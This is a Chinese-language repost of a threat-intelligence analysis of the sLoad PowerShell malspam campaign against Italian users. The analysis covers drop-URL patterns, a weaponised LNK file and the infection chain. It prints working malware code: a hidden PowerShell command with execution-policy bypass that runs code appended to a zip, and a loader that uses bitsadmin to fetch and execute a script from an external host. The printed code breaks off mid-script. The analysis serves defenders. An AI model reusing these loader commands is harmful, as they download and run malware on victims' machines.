SLoad Powershell malspam正在蔓延到意大利[安全新闻]
本文“SLoad Powershell malspam正在蔓延到意大利[安全新闻]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
一、介绍
在过去的几个月里,CERT-Yoroi观察到一种新兴攻击模式。一系列恶意电子邮件共享通用技术,这些技术可能与一个威胁组织对意大利网络全面的攻击有关。目前尚不清楚这些攻击尝试是由一个完善的网络犯罪组织修改其TTP所致,还是全新的攻击尝试。但CERT-Yoroi正在通过内部代号“Sload-ITA”(TH-163)来跟踪此威胁。去年五月,SANS ICS研究人员在英国也记录了类似的操作行为。恶意行动通过滥用基于压缩存档中的代码隐藏技术和类似的drop-url模式共享相同的drop mode:
· 2018-10-08 – 使用“/AE-9455933DGW-nota-cliente” url 模式
· 2018-10-09 – 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式
· 2018-10-15 –使用“/MA-47462780Y3-documento-cliente” url 模式
· 某些恶意邮件已从“PEC”邮箱发送
· 2018-11-19 – 使用 “/documento-aggiornato-novembre-ER16909FP9”
· CERT-PA 追踪
Yoroi-Cybaze ZLAB收集并解析了在响应操作期间恢复的样本,用来揭示这些攻击者使用的恶意植入程序的细节。下图总结了sLoad恶意软件感染的步骤。
图1. SLoad感染流程
二、技术分析
分析的恶意样本是压缩zip存档,包含两个不同文件:
1. 一个假装指向系统文件夹的链接,名为“invio fattura elettronica.lnk”
2. 一个隐藏的JPEG图像“image _20181119_100714_40.jpg”,该文件存储为HA属性。
尽管从存档中提取的LNK文件表面上看很无辜,但它的武器化方式与APT29在其最新操作期间采用的方式类似,表明该技术是几种恶意网络武器的一部分。实际上,当用户双击文件时,批处理脚本会生成下面的powershell脚本:
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
PS脚本搜索与模式“documento-aggiornato-novembre – * .zip”匹配的任何文件:如果文件存在,则脚本在其末尾提取一部分代码,然后通过“IEX”调用它;我们检查了zip文件并恢复了这部分代码。在下图中,可以看到附件存档内容分为粉红色和黄色,外来代码为蓝色。
图2.添加到Zip存档的代码
该部分文件包含powershell脚本调用的可执行代码。由于调用了“bitsadmin.exe”,此代码能够从“firetechnicaladvisor.com”下载其他脚本,然后将所有这些新下载的文件存储在“%APPDATA%/ ”文件夹中。下图显示了下载恶意植入程序后文件夹的内容:
图3.恶意植入程序的组件
下面的片段显示了负责下载这些恶意软件的代码。
$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d';
if(!(test-path $folder_to_store_file)){
New-item -itemtype directory -Force -path $folder_to_store_file;
};
$ps_to_download_and_execute='/c echo 1 > '+$h+' & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){
if(test-path $h)
Start-Sleep -s 3
}else{
$e=2
}
};
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
NxPgKLnYEhMjXT.ps1脚本安装并植入受害者的机器,在系统上注册计划任务,以确保感染持续存在。然后,该脚本会自删除。
图4.恶意植入程序的安装脚本
在快速查看CxeLtfwc.ps1脚本之后,我们还注意到恶意软件使用cmdlet“Invoke-Expression”从“config.ini”文件加载并运行另一段代码。
param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
$folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$log = $env:APPDATA+"\"+$folder_name;
以上是“SLoad Powershell malspam正在蔓延到意大利[安全新闻]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |